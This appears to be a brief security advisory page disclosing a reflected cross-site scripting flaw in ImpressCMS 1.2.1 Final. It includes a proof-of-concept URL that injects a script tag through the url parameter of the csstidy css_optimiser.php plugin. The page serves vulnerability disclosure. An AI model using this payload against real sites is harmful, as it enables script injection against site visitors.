Home
Consulting
Advisories
Software
Articles
Contact

ImpressCMS 1.2.1 Final Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in ImpressCMS 1.2.1 Final can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC